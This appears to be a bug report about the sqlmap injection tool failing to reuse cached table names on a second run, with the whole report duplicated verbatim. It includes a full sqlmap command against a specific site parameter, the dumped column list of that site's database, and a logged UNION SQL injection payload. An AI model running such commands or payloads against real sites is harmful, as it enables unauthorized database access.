Sometimes column enumeration only works the first time you analyze the page, for example:
python ../sqlmap-dev/sqlmap.py --random-agent --output-dir "../db/sqlmap/" -u "http://www.web.com/enviar.php?codigo=4821" --dbs -p codigo --technique=U --columns -D d_db
Database: d_db
Table: content
[11 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| activo | tinyint(1) |
| clip | text |
| descrip | text |
| fecha | date |
| id | int(11) |
| tag1 | varchar(15) |
| tag2 | varchar(15) |
| tag3 | varchar(15) |
| tag4 | varchar(15) |
| tag5 | varchar(15) |
| titulo | varchar(250) |
+---------+--------------+
On the second run I expect sqlmap use the cached tables, but with exactly same command, you get:
[21:49:13] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] q
If you use --fresh-queries or --flush-session you can get tables and columns again.
Its strange because if you use -v 3 flag, on the first run you get:
[21:51:07] [INFO] the SQL query used returns 12 entries
[21:51:07] [PAYLOAD] -8652' UNION ALL SELECT NULL,NULL,NULL,(SELECT CONCAT(0x71767a7071,IFNULL(CAST(table_name AS CHAR),0x20),0x71706b6a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0xxxxxxxx) LIMIT 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
........
On the second run yo only get:
[21:50:10] [INFO] the SQL query used returns 12 entries
[21:50:10] [DEBUG] performed 0 queries in 0.02 seconds
[21:50:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
[21:50:18] [CRITICAL] unable to retrieve the tables in database 'd_db'
Maybe there is some race condition. Thanks
Sometimes column enumeration only works the first time you analyze the page, for example:
python ../sqlmap-dev/sqlmap.py --random-agent --output-dir "../db/sqlmap/" -u "http://www.web.com/enviar.php?codigo=4821" --dbs -p codigo --technique=U --columns -D d_db
Database: d_db
Table: content
[11 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| activo | tinyint(1) |
| clip | text |
| descrip | text |
| fecha | date |
| id | int(11) |
| tag1 | varchar(15) |
| tag2 | varchar(15) |
| tag3 | varchar(15) |
| tag4 | varchar(15) |
| tag5 | varchar(15) |
| titulo | varchar(250) |
+---------+--------------+
On the second run I expect sqlmap use the cached tables, but with exactly same command, you get:
[21:49:13] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] q
If you use --fresh-queries or --flush-session you can get tables and columns again.
Its strange because if you use -v 3 flag, on the first run you get:
[21:51:07] [INFO] the SQL query used returns 12 entries
[21:51:07] [PAYLOAD] -8652' UNION ALL SELECT NULL,NULL,NULL,(SELECT CONCAT(0x71767a7071,IFNULL(CAST(table_name AS CHAR),0x20),0x71706b6a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0xxxxxxxx) LIMIT 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
........
On the second run yo only get:
[21:50:10] [INFO] the SQL query used returns 12 entries
[21:50:10] [DEBUG] performed 0 queries in 0.02 seconds
[21:50:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
[21:50:18] [CRITICAL] unable to retrieve the tables in database 'd_db'
Maybe there is some race condition. Thanks